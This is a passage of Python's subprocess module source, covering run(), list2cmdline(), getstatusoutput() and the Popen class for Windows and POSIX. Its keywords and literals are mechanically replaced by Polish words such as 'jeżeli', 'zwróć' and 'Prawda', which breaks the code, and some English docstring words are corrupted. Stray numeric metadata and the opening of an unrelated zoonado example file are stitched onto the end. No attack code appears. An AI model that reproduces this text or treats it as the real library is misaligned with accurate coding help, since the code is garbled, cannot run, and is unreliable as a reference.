check_returncode(self): """Raise CalledProcessError jeżeli the exit code jest non-zero.""" jeżeli self.returncode: podnieś CalledProcessError(self.returncode, self.args, self.stdout, self.stderr) def run(*popenargs, input=Nic, timeout=Nic, check=Nieprawda, **kwargs): """Run command przy arguments oraz zwróć a CompletedProcess instance. The returned instance will have attributes args, returncode, stdout oraz stderr. By default, stdout oraz stderr are nie captured, oraz those attributes will be Nic. Pass stdout=PIPE and/or stderr=PIPE w order to capture them. If check jest Prawda oraz the exit code was non-zero, it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute, oraz output & stderr attributes jeżeli those streams were captured. If timeout jest given, oraz the process takes too long, a TimeoutExpired exception will be podnieśd. There jest an optional argument "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it will be used internally. The other arguments are the same jako dla the Popen constructor. If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz stdout/stderr w the returned object will be strings rather than bytes. """ jeżeli input jest nie Nic: jeżeli 'stdin' w kwargs: podnieś ValueError('stdin oraz input arguments may nie both be used.') kwargs['stdin'] = PIPE przy Popen(*popenargs, **kwargs) jako process: spróbuj: stdout, stderr = process.communicate(input, timeout=timeout) wyjąwszy TimeoutExpired: process.kill() stdout, stderr = process.communicate() podnieś TimeoutExpired(process.args, timeout, output=stdout, stderr=stderr) wyjąwszy: process.kill() process.wait() podnieś retcode = process.poll() jeżeli check oraz retcode: podnieś CalledProcessError(retcode, process.args, output=stdout, stderr=stderr) zwróć CompletedProcess(process.args, retcode, stdout, stderr) def list2cmdline(seq): """ Translate a sequence of arguments into a command line string, using the same rules jako the MS C runtime: 1) Arguments are delimited by white space, which jest either a space albo a tab. 2) A string surrounded by double quotation marks jest interpreted jako a single argument, regardless of white space contained within. A quoted string can be embedded w an argument. 3) A double quotation mark preceded by a backslash jest interpreted jako a literal double quotation mark. 4) Backslashes are interpreted literally, unless they immediately precede a double quotation mark. 5) If backslashes immediately precede a double quotation mark, every pair of backslashes jest interpreted jako a literal backslash. If the number of backslashes jest odd, the last backslash escapes the next double quotation mark as described w rule 3. """ # See # http://msdn.microsoft.com/en-us/library/17w5ykft.aspx # albo search http://msdn.microsoft.com for # "Parsing C++ Command-Line Arguments" result = [] needquote = Nieprawda dla arg w seq: bs_buf = [] # Add a space to separate this argument z the others jeżeli result: result.append(' ') needquote = (" " w arg) albo ("\t" w arg) albo nie arg jeżeli needquote: result.append('"') dla c w arg: jeżeli c == '\\': # Don't know jeżeli we need to double yet. bs_buf.append(c) albo_inaczej c == '"': # Double backslashes. result.append('\\' * len(bs_buf)*2) bs_buf = [] result.append('\\"') inaczej: # Normal char jeżeli bs_buf: result.extend(bs_buf) bs_buf = [] result.append(c) # Add remaining backslashes, jeżeli any. jeżeli bs_buf: result.extend(bs_buf) jeżeli needquote: result.extend(bs_buf) result.append('"') zwróć ''.join(result) # Various tools dla executing commands oraz looking at their output oraz status. # def getstatusoutput(cmd): """ Return (status, output) of executing cmd w a shell. Execute the string 'cmd' w a shell przy 'check_output' oraz zwróć a 2-tuple (status, output). Universal newlines mode jest used, meaning that the result przy be decoded to a string. A trailing newline jest stripped z the output. The exit status dla the command can be interpreted according to the rules dla the function 'wait'. Example: >>> zaimportuj subprocess >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file albo directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: nie found') """ spróbuj: data = check_output(cmd, shell=Prawda, universal_newlines=Prawda, stderr=STDOUT) status = 0 wyjąwszy CalledProcessError jako ex: data = ex.output status = ex.returncode jeżeli data[-1:] == '\n': data = data[:-1] zwróć status, data def getoutput(cmd): """Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. Example: >>> zaimportuj subprocess >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' """ zwróć getstatusoutput(cmd)[1] _PLATFORM_DEFAULT_CLOSE_FDS = object() klasa Popen(object): _child_created = Nieprawda # Set here since __del__ checks it def __init__(self, args, bufsize=-1, executable=Nic, stdin=Nic, stdout=Nic, stderr=Nic, preexec_fn=Nic, close_fds=_PLATFORM_DEFAULT_CLOSE_FDS, shell=Nieprawda, cwd=Nic, env=Nic, universal_newlines=Nieprawda, startupinfo=Nic, creationflags=0, restore_signals=Prawda, start_new_session=Nieprawda, dalej_fds=()): """Create new Popen instance.""" _cleanup() # Held dopóki anything jest calling waitpid before returncode has been # updated to prevent clobbering returncode jeżeli wait() albo poll() are # called z multiple threads at once. After acquiring the lock, # code must re-check self.returncode to see jeżeli another thread just # finished a waitpid() call. self._waitpid_lock = threading.Lock() self._input = Nic self._communication_started = Nieprawda jeżeli bufsize jest Nic: bufsize = -1 # Restore default jeżeli nie isinstance(bufsize, int): podnieś TypeError("bufsize must be an integer") jeżeli _mswindows: jeżeli preexec_fn jest nie Nic: podnieś ValueError("preexec_fn jest nie supported on Windows " "platforms") any_stdio_set = (stdin jest nie Nic albo stdout jest nie Nic albo stderr jest nie Nic) jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: jeżeli any_stdio_set: close_fds = Nieprawda inaczej: close_fds = Prawda albo_inaczej close_fds oraz any_stdio_set: podnieś ValueError( "close_fds jest nie supported on Windows platforms" " jeżeli you redirect stdin/stdout/stderr") inaczej: # POSIX jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: close_fds = Prawda jeżeli dalej_fds oraz nie close_fds: warnings.warn("pass_fds overriding close_fds.", RuntimeWarning) close_fds = Prawda jeżeli startupinfo jest nie Nic: podnieś ValueError("startupinfo jest only supported on Windows " "platforms") jeżeli creationflags != 0: podnieś ValueError("creationflags jest only supported on Windows " "platforms") self.args = args self.stdin = Nic self.stdout = Nic self.stderr = Nic self.pid = Nic self.returncode = Nic self.universal_newlines = universal_newlines # Input oraz output objects. The general principle jest like # this: # # Parent Child # ------ ----- # p2cwrite ---stdin---> p2cread # c2pread <--stdout--- c2pwrite # errread <--stderr--- errwrite # # On POSIX, the child objects are file descriptors. On # Windows, these are Windows file handles. The parent objects # are file descriptors on both platforms. The parent objects # are -1 when nie using PIPEs. The child objects are -1 # when nie redirecting. (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) = self._get_handles(stdin, stdout, stderr) # We wrap OS handles *before* launching the child, otherwise a # quickly terminating child could make our fds unwrappable # (see #8458). jeżeli _mswindows: jeżeli p2cwrite != -1: p2cwrite = msvcrt.open_osfhandle(p2cwrite.Detach(), 0) jeżeli c2pread != -1: c2pread = msvcrt.open_osfhandle(c2pread.Detach(), 0) jeżeli errread != -1: errread = msvcrt.open_osfhandle(errread.Detach(), 0) jeżeli p2cwrite != -1: self.stdin = io.open(p2cwrite, 'wb', bufsize) jeżeli universal_newlines: self.stdin = io.TextIOWrapper(self.stdin, write_through=Prawda, line_buffering=(bufsize == 1)) jeżeli c2pread != -1: self.stdout = io.open(c2pread, 'rb', bufsize) jeżeli universal_newlines: self.stdout = io.TextIOWrapper(self.stdout) jeżeli errread != -1: self.stderr = io.open(errread, 'rb', bufsize) jeżeli universal_newlines: self.stderr = io.TextIOWrapper(self.stderr) self._closed_child_pipe_fds = Nieprawda spróbuj: self._execute_child(args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session) wyjąwszy: # Cleanup jeżeli the child failed starting. dla f w filter(Nic, (self.stdin, self.stdout, self.stderr)): spróbuj: f.close() wyjąwszy OSError: dalej # Ignore EBADF albo other errors. jeżeli nie self._closed_child_pipe_fds: to_close = [] jeżeli stdin == PIPE: to_close.append(p2cread) jeżeli stdout == PIPE: to_close.append(c2pwrite) jeżeli stderr == PIPE: to_close.append(errwrite) jeżeli hasattr(self, '_devnull'): to_close.append(self._devnull) dla fd w to_close: spróbuj: os.close(fd) wyjąwszy OSError: dalej podnieś def _translate_newlines(self, data, encoding): data = data.decode(encoding) zwróć data.replace("\r\n", "\n").replace("\r", "\n") def __enter__(self): zwróć self def __exit__(self, type, value, traceback): jeżeli self.stdout: self.stdout.close() jeżeli self.stderr: self.stderr.close() spróbuj: # Flushing a BufferedWriter may podnieś an error jeżeli self.stdin: self.stdin.close() w_końcu: # Wait dla the process to terminate, to avoid zombies. self.wait() def __del__(self, _maxsize=sys.maxsize): jeżeli nie self._child_created: # We didn't get to successfully create a child process. zwróć # In case the child hasn't been waited on, check jeżeli it's done. self._internal_poll(_deadstate=_maxsize) jeżeli self.returncode jest Nic oraz _active jest nie Nic: # Child jest still running, keep us alive until we can wait on it. _active.append(self) def _get_devnull(self): jeżeli nie hasattr(self, '_devnull'): self._devnull = os.open(os.devnull, os.O_RDWR) zwróć self._devnull def _stdin_write(self, input): jeżeli input: spróbuj: self.stdin.write(input) wyjąwszy BrokenPipeError: # communicate() must ignore broken pipe error dalej wyjąwszy OSError jako e: jeżeli e.errno == errno.EINVAL oraz self.poll() jest nie Nic: # Issue #19612: On Windows, stdin.write() fails przy EINVAL # jeżeli the process already exited before the write dalej inaczej: podnieś self.stdin.close() def communicate(self, input=Nic, timeout=Nic): """Interact przy process: Send data to stdin. Read data from stdout oraz stderr, until end-of-file jest reached. Wait for process to terminate. The optional "input" argument should be data to be sent to the child process (jeżeli self.universal_newlines jest Prawda, this should be a string; jeżeli it jest Nieprawda, "input" should be bytes), albo Nic, jeżeli no data should be sent to the child. communicate() returns a tuple (stdout, stderr). These will be bytes or, jeżeli self.universal_newlines was Prawda, a string. """ jeżeli self._communication_started oraz input: podnieś ValueError("Cannot send input after starting communication") # Optimization: If we are nie worried about timeouts, we haven't # started communicating, oraz we have one albo zero pipes, using select() # albo threads jest unnecessary. jeżeli (timeout jest Nic oraz nie self._communication_started oraz [self.stdin, self.stdout, self.stderr].count(Nic) >= 2): stdout = Nic stderr = Nic jeżeli self.stdin: self._stdin_write(input) albo_inaczej self.stdout: stdout = self.stdout.read() self.stdout.close() albo_inaczej self.stderr: stderr = self.stderr.read() self.stderr.close() self.wait() inaczej: jeżeli timeout jest nie Nic: endtime = _time() + timeout inaczej: endtime = Nic spróbuj: stdout, stderr = self._communicate(input, endtime, timeout) w_końcu: self._communication_started = Prawda sts = self.wait(timeout=self._remaining_time(endtime)) zwróć (stdout, stderr) def poll(self): zwróć self._internal_poll() def _remaining_time(self, endtime): """Convenience dla _communicate when computing timeouts.""" jeżeli endtime jest Nic: zwróć Nic inaczej: zwróć endtime - _time() def _check_timeout(self, endtime, orig_timeout): """Convenience dla checking jeżeli a timeout has expired.""" jeżeli endtime jest Nic: zwróć jeżeli _time() > endtime: podnieś TimeoutExpired(self.args, orig_timeout) jeżeli _mswindows: # # Windows methods # def _get_handles(self, stdin, stdout, stderr): """Construct oraz zwróć tuple przy IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ jeżeli stdin jest Nic oraz stdout jest Nic oraz stderr jest Nic: zwróć (-1, -1, -1, -1, -1, -1) p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 jeżeli stdin jest Nic: p2cread = _winapi.GetStdHandle(_winapi.STD_INPUT_HANDLE) jeżeli p2cread jest Nic: p2cread, _ = _winapi.CreatePipe(Nic, 0) p2cread = Handle(p2cread) _winapi.CloseHandle(_) albo_inaczej stdin == PIPE: p2cread, p2cwrite = _winapi.CreatePipe(Nic, 0) p2cread, p2cwrite = Handle(p2cread), Handle(p2cwrite) albo_inaczej stdin == DEVNULL: p2cread = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdin, int): p2cread = msvcrt.get_osfhandle(stdin) inaczej: # Assuming file-like object p2cread = msvcrt.get_osfhandle(stdin.fileno()) p2cread = self._make_inheritable(p2cread) jeżeli stdout jest Nic: c2pwrite = _winapi.GetStdHandle(_winapi.STD_OUTPUT_HANDLE) jeżeli c2pwrite jest Nic: _, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pwrite = Handle(c2pwrite) _winapi.CloseHandle(_) albo_inaczej stdout == PIPE: c2pread, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pread, c2pwrite = Handle(c2pread), Handle(c2pwrite) albo_inaczej stdout == DEVNULL: c2pwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdout, int): c2pwrite = msvcrt.get_osfhandle(stdout) inaczej: # Assuming file-like object c2pwrite = msvcrt.get_osfhandle(stdout.fileno()) c2pwrite = self._make_inheritable(c2pwrite) jeżeli stderr jest Nic: errwrite = _winapi.GetStdHandle(_winapi.STD_ERROR_HANDLE) jeżeli errwrite jest Nic: _, errwrite = _winapi.CreatePipe(Nic, 0) errwrite = Handle(errwrite) _winapi.CloseHandle(_) albo_inaczej stderr == PIPE: errread, errwrite = _winapi.CreatePipe(Nic, 0) errread, errwrite = Handle(errread), Handle(errwrite) albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stderr, int): errwrite = msvcrt.get_osfhandle(stderr) inaczej: # Assuming file-like object errwrite = msvcrt.get_osfhandle(stderr.fileno()) errwrite = self._make_inheritable(errwrite) zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _make_inheritable(self, handle): """Return a duplicate of handle, which jest inheritable""" h = _winapi.DuplicateHandle( _winapi.GetCurrentProcess(), handle, _winapi.GetCurrentProcess(), 0, 1, _winapi.DUPLICATE_SAME_ACCESS) zwróć Handle(h) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, unused_restore_signals, unused_start_new_session): """Execute program (MS Windows version)""" assert nie dalej_fds, "pass_fds nie supported on Windows." jeżeli nie isinstance(args, str): args = list2cmdline(args) # Process startup details jeżeli startupinfo jest Nic: startupinfo = STARTUPINFO() jeżeli -1 nie w (p2cread, c2pwrite, errwrite): startupinfo.dwFlags |= _winapi.STARTF_USESTDHANDLES startupinfo.hStdInput = p2cread startupinfo.hStdOutput = c2pwrite startupinfo.hStdError = errwrite jeżeli shell: startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW startupinfo.wShowWindow = _winapi.SW_HIDE comspec = os.environ.get("COMSPEC", "cmd.exe") args = '{} /c "{}"'.format (comspec, args) # Start the process spróbuj: hp, ht, pid, tid = _winapi.CreateProcess(executable, args, # no special security Nic, Nic, int(nie close_fds), creationflags, env, cwd, startupinfo) w_końcu: # Child jest launched. Close the parent's copy of those pipe # handles that only the child should have open. You need # to make sure that no handles to the write end of the # output pipe are maintained w this process albo inaczej the # pipe will nie close when the child process exits oraz the # ReadFile will hang. jeżeli p2cread != -1: p2cread.Close() jeżeli c2pwrite != -1: c2pwrite.Close() jeżeli errwrite != -1: errwrite.Close() jeżeli hasattr(self, '_devnull'): os.close(self._devnull) # Retain the process handle, but close the thread handle self._child_created = Prawda self._handle = Handle(hp) self.pid = pid _winapi.CloseHandle(ht) def _internal_poll(self, _deadstate=Nic, _WaitForSingleObject=_winapi.WaitForSingleObject, _WAIT_OBJECT_0=_winapi.WAIT_OBJECT_0, _GetExitCodeProcess=_winapi.GetExitCodeProcess): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it can only refer to objects w its local scope. """ jeżeli self.returncode jest Nic: jeżeli _WaitForSingleObject(self._handle, 0) == _WAIT_OBJECT_0: self.returncode = _GetExitCodeProcess(self._handle) zwróć self.returncode def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli endtime jest nie Nic: timeout = self._remaining_time(endtime) jeżeli timeout jest Nic: timeout_millis = _winapi.INFINITE inaczej: timeout_millis = int(timeout * 1000) jeżeli self.returncode jest Nic: result = _winapi.WaitForSingleObject(self._handle, timeout_millis) jeżeli result == _winapi.WAIT_TIMEOUT: podnieś TimeoutExpired(self.args, timeout) self.returncode = _winapi.GetExitCodeProcess(self._handle) zwróć self.returncode def _readerthread(self, fh, buffer): buffer.append(fh.read()) fh.close() def _communicate(self, input, endtime, orig_timeout): # Start reader threads feeding into a list hanging off of this # object, unless they've already been started. jeżeli self.stdout oraz nie hasattr(self, "_stdout_buff"): self._stdout_buff = [] self.stdout_thread = \ threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff)) self.stdout_thread.daemon = Prawda self.stdout_thread.start() jeżeli self.stderr oraz nie hasattr(self, "_stderr_buff"): self._stderr_buff = [] self.stderr_thread = \ threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff)) self.stderr_thread.daemon = Prawda self.stderr_thread.start() jeżeli self.stdin: self._stdin_write(input) # Wait dla the reader threads, albo time out. If we time out, the # threads remain reading oraz the fds left open w case the user # calls communicate again. jeżeli self.stdout jest nie Nic: self.stdout_thread.join(self._remaining_time(endtime)) jeżeli self.stdout_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) jeżeli self.stderr jest nie Nic: self.stderr_thread.join(self._remaining_time(endtime)) jeżeli self.stderr_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) # Collect the output z oraz close both pipes, now that we know # both have been read successfully. stdout = Nic stderr = Nic jeżeli self.stdout: stdout = self._stdout_buff self.stdout.close() jeżeli self.stderr: stderr = self._stderr_buff self.stderr.close() # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = stdout[0] jeżeli stderr jest nie Nic: stderr = stderr[0] zwróć (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ jeżeli sig == signal.SIGTERM: self.terminate() albo_inaczej sig == signal.CTRL_C_EVENT: os.kill(self.pid, signal.CTRL_C_EVENT) albo_inaczej sig == signal.CTRL_BREAK_EVENT: os.kill(self.pid, signal.CTRL_BREAK_EVENT) inaczej: podnieś ValueError("Unsupported signal: {}".format(sig)) def terminate(self): """Terminates the process """ spróbuj: _winapi.TerminateProcess(self._handle, 1) wyjąwszy PermissionError: # ERROR_ACCESS_DENIED (winerror 5) jest received when the # process already died. rc = _winapi.GetExitCodeProcess(self._handle) jeżeli rc == _winapi.STILL_ACTIVE: podnieś self.returncode = rc kill = terminate inaczej: # # POSIX methods # def _get_handles(self, stdin, stdout, stderr): """Construct oraz zwróć tuple przy IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 jeżeli stdin jest Nic: dalej albo_inaczej stdin == PIPE: p2cread, p2cwrite = os.pipe() albo_inaczej stdin == DEVNULL: p2cread = self._get_devnull() albo_inaczej isinstance(stdin, int): p2cread = stdin inaczej: # Assuming file-like object p2cread = stdin.fileno() jeżeli stdout jest Nic: dalej albo_inaczej stdout == PIPE: c2pread, c2pwrite = os.pipe() albo_inaczej stdout == DEVNULL: c2pwrite = self._get_devnull() albo_inaczej isinstance(stdout, int): c2pwrite = stdout inaczej: # Assuming file-like object c2pwrite = stdout.fileno() jeżeli stderr jest Nic: dalej albo_inaczej stderr == PIPE: errread, errwrite = os.pipe() albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = self._get_devnull() albo_inaczej isinstance(stderr, int): errwrite = stderr inaczej: # Assuming file-like object errwrite = stderr.fileno() zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session): """Execute program (POSIX version)""" jeżeli isinstance(args, (str, bytes)): args = [args] inaczej: args = list(args) jeżeli shell: args = ["/bin/sh", "-c"] + args jeżeli executable: args[0] = executable jeżeli executable jest Nic: executable = args[0] orig_executable = executable # For transferring possible exec failure z child to parent. # Data format: "exception name:hex errno:description" # Pickle jest nie used; it jest complex oraz involves memory allocation. errpipe_read, errpipe_write = os.pipe() # errpipe_write must nie be w the standard io 0, 1, albo 2 fd range. low_fds_to_close = [] dopóki errpipe_write < 3: low_fds_to_close.append(errpipe_write) errpipe_write = os.dup(errpipe_write) dla low_fd w low_fds_to_close: os.close(low_fd) spróbuj: spróbuj: # We must avoid complex work that could involve # malloc albo free w the child process to avoid # potential deadlocks, thus we do all this here. # oraz dalej it to fork_exec() jeżeli env jest nie Nic: env_list = [os.fsencode(k) + b'=' + os.fsencode(v) dla k, v w env.items()] inaczej: env_list = Nic # Use execv instead of execve. executable = os.fsencode(executable) jeżeli os.path.dirname(executable): executable_list = (executable,) inaczej: # This matches the behavior of os._execvpe(). executable_list = tuple( os.path.join(os.fsencode(dir), executable) dla dir w os.get_exec_path(env)) fds_to_keep = set(pass_fds) fds_to_keep.add(errpipe_write) self.pid = _posixsubprocess.fork_exec( args, executable_list, close_fds, sorted(fds_to_keep), cwd, env_list, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, errpipe_read, errpipe_write, restore_signals, start_new_session, preexec_fn) self._child_created = Prawda w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_write) # self._devnull jest nie always defined. devnull_fd = getattr(self, '_devnull', Nic) jeżeli p2cread != -1 oraz p2cwrite != -1 oraz p2cread != devnull_fd: os.close(p2cread) jeżeli c2pwrite != -1 oraz c2pread != -1 oraz c2pwrite != devnull_fd: os.close(c2pwrite) jeżeli errwrite != -1 oraz errread != -1 oraz errwrite != devnull_fd: os.close(errwrite) jeżeli devnull_fd jest nie Nic: os.close(devnull_fd) # Prevent a double close of these fds z __init__ on error. self._closed_child_pipe_fds = Prawda # Wait dla exec to fail albo succeed; possibly raising an # exception (limited w size) errpipe_data = bytearray() dopóki Prawda: part = os.read(errpipe_read, 50000) errpipe_data += part jeżeli nie part albo len(errpipe_data) > 50000: przerwij w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_read) jeżeli errpipe_data: spróbuj: os.waitpid(self.pid, 0) wyjąwszy ChildProcessError: dalej spróbuj: exception_name, hex_errno, err_msg = ( errpipe_data.split(b':', 2)) wyjąwszy ValueError: exception_name = b'SubprocessError' hex_errno = b'0' err_msg = (b'Bad exception data z child: ' + repr(errpipe_data)) child_exception_type = getattr( builtins, exception_name.decode('ascii'), SubprocessError) err_msg = err_msg.decode(errors="surrogatepass") jeżeli issubclass(child_exception_type, OSError) oraz hex_errno: errno_num = int(hex_errno, 16) child_exec_never_called = (err_msg == "noexec") jeżeli child_exec_never_called: err_msg = "" jeżeli errno_num != 0: err_msg = os.strerror(errno_num) jeżeli errno_num == errno.ENOENT: jeżeli child_exec_never_called: # The error must be z chdir(cwd). err_msg += ': ' + repr(cwd) inaczej: err_msg += ': ' + repr(orig_executable) podnieś child_exception_type(errno_num, err_msg) podnieś child_exception_type(err_msg) def _handle_exitstatus(self, sts, _WIFSIGNALED=os.WIFSIGNALED, _WTERMSIG=os.WTERMSIG, _WIFEXITED=os.WIFEXITED, _WEXITSTATUS=os.WEXITSTATUS): """All callers to this function MUST hold self._waitpid_lock.""" # This method jest called (indirectly) by __del__, so it cannot # refer to anything outside of its local scope. jeżeli _WIFSIGNALED(sts): self.returncode = -_WTERMSIG(sts) albo_inaczej _WIFEXITED(sts): self.returncode = _WEXITSTATUS(sts) inaczej: # Should never happen podnieś SubprocessError("Unknown child exit status!") def _internal_poll(self, _deadstate=Nic, _waitpid=os.waitpid, _WNOHANG=os.WNOHANG, _ECHILD=errno.ECHILD): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it cannot reference anything outside of the local scope (nor can any methods it calls). """ jeżeli self.returncode jest Nic: jeżeli nie self._waitpid_lock.acquire(Nieprawda): # Something inaczej jest busy calling waitpid. Don't allow two # at once. We know nothing yet. zwróć Nic spróbuj: jeżeli self.returncode jest nie Nic: zwróć self.returncode # Another thread waited. pid, sts = _waitpid(self.pid, _WNOHANG) jeżeli pid == self.pid: self._handle_exitstatus(sts) wyjąwszy OSError jako e: jeżeli _deadstate jest nie Nic: self.returncode = _deadstate albo_inaczej e.errno == _ECHILD: # This happens jeżeli SIGCLD jest set to be ignored albo # waiting dla child processes has otherwise been # disabled dla our process. This child jest dead, we # can't get the status. # http://bugs.python.org/issue15756 self.returncode = 0 w_końcu: self._waitpid_lock.release() zwróć self.returncode def _try_wait(self, wait_flags): """All callers to this function MUST hold self._waitpid_lock.""" spróbuj: (pid, sts) = os.waitpid(self.pid, wait_flags) wyjąwszy ChildProcessError: # This happens jeżeli SIGCLD jest set to be ignored albo waiting # dla child processes has otherwise been disabled dla our # process. This child jest dead, we can't get the status. pid = self.pid sts = 0 zwróć (pid, sts) def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli self.returncode jest nie Nic: zwróć self.returncode # endtime jest preferred to timeout. timeout jest only used for # printing. jeżeli endtime jest nie Nic albo timeout jest nie Nic: jeżeli endtime jest Nic: endtime = _time() + timeout albo_inaczej timeout jest Nic: timeout = self._remaining_time(endtime) jeżeli endtime jest nie Nic: # Enter a busy loop jeżeli we have a timeout. This busy loop was # cribbed z Lib/threading.py w Thread.wait() at r71065. delay = 0.0005 # 500 us -> initial delay of 1 ms dopóki Prawda: jeżeli self._waitpid_lock.acquire(Nieprawda): spróbuj: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(os.WNOHANG) assert pid == self.pid albo pid == 0 jeżeli pid == self.pid: self._handle_exitstatus(sts) przerwij w_końcu: self._waitpid_lock.release() remaining = self._remaining_time(endtime) jeżeli remaining <= 0: podnieś TimeoutExpired(self.args, timeout) delay = min(delay * 2, remaining, .05) time.sleep(delay) inaczej: dopóki self.returncode jest Nic: przy self._waitpid_lock: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(0) # Check the pid oraz loop jako waitpid has been known to # zwróć 0 even without WNOHANG w odd situations. # http://bugs.python.org/issue14396. jeżeli pid == self.pid: self._handle_exitstatus(sts) zwróć self.returncode def _communicate(self, input, endtime, orig_timeout): jeżeli self.stdin oraz nie self._communication_started: # Flush stdio buffer. This might block, jeżeli the user has # been writing to .stdin w an uncontrolled fashion. self.stdin.flush() jeżeli nie input: self.stdin.close() stdout = Nic stderr = Nic # Only create this mapping jeżeli we haven't already. jeżeli nie self._communication_started: self._fileobj2output = {} jeżeli self.stdout: self._fileobj2output[self.stdout] = [] jeżeli self.stderr: self._fileobj2output[self.stderr] = [] jeżeli self.stdout: stdout = self._fileobj2output[self.stdout] jeżeli self.stderr: stderr = self._fileobj2output[self.stderr] self._save_input(input) jeżeli self._input: input_view = memoryview(self._input) przy _PopenSelector() jako selector: jeżeli self.stdin oraz input: selector.register(self.stdin, selectors.EVENT_WRITE) jeżeli self.stdout: selector.register(self.stdout, selectors.EVENT_READ) jeżeli self.stderr: selector.register(self.stderr, selectors.EVENT_READ) dopóki selector.get_map(): timeout = self._remaining_time(endtime) jeżeli timeout jest nie Nic oraz timeout < 0: podnieś TimeoutExpired(self.args, orig_timeout) ready = selector.select(timeout) self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the file # objects; they are no longer using C stdio! dla key, events w ready: jeżeli key.fileobj jest self.stdin: chunk = input_view[self._input_offset : self._input_offset + _PIPE_BUF] spróbuj: self._input_offset += os.write(key.fd, chunk) wyjąwszy BrokenPipeError: selector.unregister(key.fileobj) key.fileobj.close() inaczej: jeżeli self._input_offset >= len(self._input): selector.unregister(key.fileobj) key.fileobj.close() albo_inaczej key.fileobj w (self.stdout, self.stderr): data = os.read(key.fd, 32768) jeżeli nie data: selector.unregister(key.fileobj) key.fileobj.close() self._fileobj2output[key.fileobj].append(data) self.wait(timeout=self._remaining_time(endtime)) # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = b''.join(stdout) jeżeli stderr jest nie Nic: stderr = b''.join(stderr) # Translate newlines, jeżeli requested. # This also turns bytes into strings. jeżeli self.universal_newlines: jeżeli stdout jest nie Nic: stdout = self._translate_newlines(stdout, self.stdout.encoding) jeżeli stderr jest nie Nic: stderr = self._translate_newlines(stderr, self.stderr.encoding) zwróć (stdout, stderr) def _save_input(self, input): # This method jest called z the _communicate_with_*() methods # so that jeżeli we time out dopóki communicating, we can kontynuuj # sending input jeżeli we retry. jeżeli self.stdin oraz self._input jest Nic: self._input_offset = 0 self._input = input jeżeli self.universal_newlines oraz input jest nie Nic: self._input = self._input.encode(self.stdin.encoding) def send_signal(self, sig): """Send a signal to the process """ os.kill(self.pid, sig) def terminate(self): """Terminate the process przy SIGTERM """ self.send_signal(signal.SIGTERM) def kill(self): """Kill the process przy SIGKILL """ self.send_signal(signal.SIGKILL)
6,483
0
591
c55bcbcf6e523260b0959341789ad27b8dd43606
1,279
py
Python
examples/party.py
hulu316/zoonado
cb06102f95e7da9c0e418bb9e327045e012a1497
[ "Apache-2.0" ]
12
2016-04-14T09:55:38.000Z
2018-01-07T13:12:47.000Z
examples/party.py
hulu316/zoonado
cb06102f95e7da9c0e418bb9e327045e012a1497
[ "Apache-2.0" ]
16
2016-07-21T09:45:38.000Z
2017-09-22T19:06:14.000Z
examples/party.py
hulu316/zoonado
cb06102f95e7da9c0e418bb9e327045e012a1497
[ "Apache-2.0" ]
8
2016-07-21T09:06:37.000Z
2019-07-26T05:48:00.000Z
import logging import random from tornado import gen log = logging.getLogger() @gen.coroutine @gen.coroutine
23.685185
74
0.605942
